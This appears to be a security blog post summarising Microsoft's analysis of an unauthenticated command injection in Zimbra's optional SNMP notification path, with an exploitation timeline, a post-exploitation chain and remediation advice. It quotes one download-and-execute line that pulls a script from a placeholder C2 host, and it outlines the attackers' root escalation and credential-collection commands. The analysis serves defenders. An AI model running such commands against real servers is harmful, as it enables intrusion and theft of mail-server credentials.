The Zimbra Bug That Turned a Monitoring Add-on into a Command Line
Microsoft published a September 30, 2026 deep-dive on CVE-2026-73570 — an unauthenticated command injection in Zimbra's optional SNMP notification path — with exploitation observed between t
TL;DR
- On September 30, 2026, Microsoft's threat-intelligence team published its tracking of CVE-2026-73570: an unauthenticated OS command injection in the Zimbra Collaboration Suite's SNMP notification path, triggered by a specially crafted email against internet-facing servers.
- The trigger requires the optional zimbra-snmp package installed and SNMP notifications enabled — a monitoring configuration, not a default mail setup. No authentication, no user interaction.
- The window matters as much as the flaw: ZCS 10.1.20 shipped the fix on July 20, 2026; the CVE became public on August 13, 2026; and Microsoft observed dedicated out-of-band scanners probing the injection path between those two dates.
- Post-exploitation was heavy: JSP webshells across Jetty and mailboxd paths, privilege escalation to root through Zimbra's own sudo-authorized helpers plus a pam_exec hook, credential collection via zmlocalconfig and LDAP, and lateral movement across the cluster over the Zimbra SSH identity.
- Microsoft's remediation is unambiguous: patch to 10.1.20+, and where patching must wait, uninstall the optional zimbra-snmp package, disable SNMP notifications, and restrict SNMP and SMTP access.
The vulnerability that hides in a monitoring path
CVE-2026-73570 is an unauthenticated command-injection flaw in Zimbra's SNMP notification processing. Mail servers use SNMP for exactly the kind of thing it sounds like: health monitoring, service-state changes, alert generation. A crafted SMTP request can introduce untrusted input into that notification processing path — and when Zimbra's health monitoring reacts to a service-state change, the swatchdog component incorporates the attacker-controlled value into an snmptrap shell invocation. If the input is not sufficiently sanitized, embedded shell commands execute with the privileges of the zimbra service account.

This is the class of bug that inventories miss. Zimbra is a mail platform; the SNMP package is optional infrastructure tacked onto it. Nobody treats a monitoring add-on as an attack surface of the mail server, yet here it is the unauthenticated entry point into one of the most sensitive servers most organizations run. An attacker who reaches the SMTP path of an internet-facing Zimbra server, with that optional package enabled, gets command execution on the mail host — no credentials, no click, no user interaction.
The patch-window exploitation Microsoft watched
The timeline is the uncomfortable part. Zimbra released ZCS 10.1.20 with the fix on July 20, 2026. The CVE was publicly disclosed on August 13, 2026. Between those dates, Microsoft says it observed two distinct out-of-band scanning tools probing the vulnerable injection point — using the same swatchdog-to-snmptrap execution path later observed in real exploitation, with probes validated through public interaction services such as oast[.]fun, oast[.]online, dnslog[.]pp[.]ua, and requestrepo[.]com.
That is the pattern anyone running public-facing infrastructure should internalize: a fix that ships quietly creates a window where the only people staring at the vulnerable code path are the scanner operators and the vendors. Microsoft identified activity targeting this injection path during that interval — exactly the window when a patch exists but the population has not applied it, and when disclosure has not yet made the flaw visible to the broader defender community. If your Zimbra fleet was at 10.1.19 or earlier on August 13, you were in that window with no idea the flaw existed.

What came after the shell
Microsoft's report goes beyond the initial injection into the full campaign playbook, and it reads like a checklist of what a sophisticated operator does with mail-server access:
- Webshells first. Attackers changed webroot permissions, reconstructed an encoded and compressed payload from staged fragments, and wrote the decoded JSP to publicly accessible application directories — then removed the staging fragments. Multiple webshells were deployed across Jetty and mailboxd application paths, with copies on peer mailbox nodes.
- Privilege escalation through Zimbra's own helpers. The escalation abused legitimate sudo-authorized service helpers: a writable log directory, the zmmailboxdmgr process, a symlink into /etc/pam.d, a pam_exec session hook, and the zmstat-fd helper — producing a NOPASSWD: ALL entry for the zimbra account, with the original PAM content restored afterwards.
- Credential collection at the platform level. The zmlocalconfig -s command exposed credentials used by LDAP, MySQL, Postfix, Amavis, and replication; authenticated ldapsearch queries pulled zimbraPreAuthKey, zimbraAuthTokenKey, and zimbraTwoFactorAuthSecret values.
- Lateral movement over Zimbra's own trust. The existing SSH identity at /opt/zimbra/.ssh/zimbra_identity connected to other trusted nodes non-interactively, and rsync moved staged payloads, helpers and webshells between nodes.

wget -qO- http://[C2]/de.sh | sh with a trailing '#' comment swallowing the remaining legitimate arguments.The exfiltration attempt Microsoft documents is characteristic: mailbox-backup content archived into /opt/zimbra/final.tar.gz, AzCopy downloaded from a signed Microsoft URL, and a transfer to an Azure Blob SAS URL — evidence does not confirm the transfer completed. And one observation deserves a full sentence on its own: the most consequential outcomes, including full mail-store staging, involved no malware family at all — just an interactive shell. Named-malware detections are a fine tripwire; they are not the whole detection story.
Why this is an attack-surface problem, not just a patch problem
The temptation is to file CVE-2026-73570 under "patch your mail server." That misses the structural lesson, and it is the one that will recur: the flaw lives in an optional package that most Zimbra inventories would not even flag as security-relevant. A health-monitoring add-on, enabled to satisfy a monitoring requirement, became an unauthenticated root-adjacent entry point into the mail store. The attack surface of a mail server is not its SMTP listener; it is every process that touches attacker-influenced data, including the ones installed years ago to watch the others.
This is the same reasoning we applied to the Ubuntu container-escape disclosure: the boundary that marketing describes and the boundary that attacks cross are rarely the same line. For Zimbra the line moved from "authenticated webmail" to "SNMP notification handler" the day someone enabled an optional package. Inventory that answer before the next advisory answers it for you.

What to do with a Zimbra fleet today
Microsoft's guidance is concrete, and the order matters:
- Patch immediately: upgrade all Zimbra Collaboration Suite instances to 10.1.20 or later. Zimbra's own advisories confirm 10.1.20 as the fixed release.
- Where patching must wait: uninstall the optional zimbra-snmp package, disable SNMP notifications, and restrict SNMP and SMTP access to trusted hosts only.
- Treat reverse-shell alerts on internet-facing mail servers as priority incidents — a confirmed reverse shell means attacker access even when nothing was quarantined.
- Rotate Zimbra authentication secrets, especially domain zimbraPreAuthKey values, and inspect systemd units for unexpected ownership, enablement, or timestamp changes — the zimlog.service disguise was timestomped to look like a normal logging unit.
- Hunt for redundant webshell persistence across every mailbox node's application and servlet-work directories. Removing one known JSP does not eliminate access.

The single most transferable practice from Microsoft's report is the injection signature it names hunting guidance: a legitimate snmptrap invocation immediately followed by shell metacharacters and a wget or curl call, wrapped in a trailing '#' comment that swallows the remaining arguments. That signature is detectable in logs long before a named malware family ever appears on disk. For anyone running mail servers — Zimbra, Exchange, or anything custom — auditing for that shape is a better use of the next hour than waiting for the next vendor alert. The monitoring add-on was the door. The logs were always the alarm.
Sources
Source: Unauthenticated command injection on internet-facing mail servers: tracking CVE-2026-73570 — microsoft.com/en-us/security/blog, 2026-09-30 (captured 2026-10-01; all attack-chain facts, detections, IOC names and mitigations quoted from the post; three official Microsoft figures). Source: Zimbra Security Advisories — wiki.zimbra.com (official vendor advisories confirming the fix in ZCS 10.1.20). Source: NVD CVE-2026-73570 — nvd.nist.gov (publication date 2026-08-13, CWE-78). Internal linkage: CVE-2026-80521 Ubuntu container escape. More security analysis on neticslabs.com.
Source: Microsoft Security Blog, 2026-09-30. Figures: official Microsoft Security Blog graphics, fetched 2026-10-01.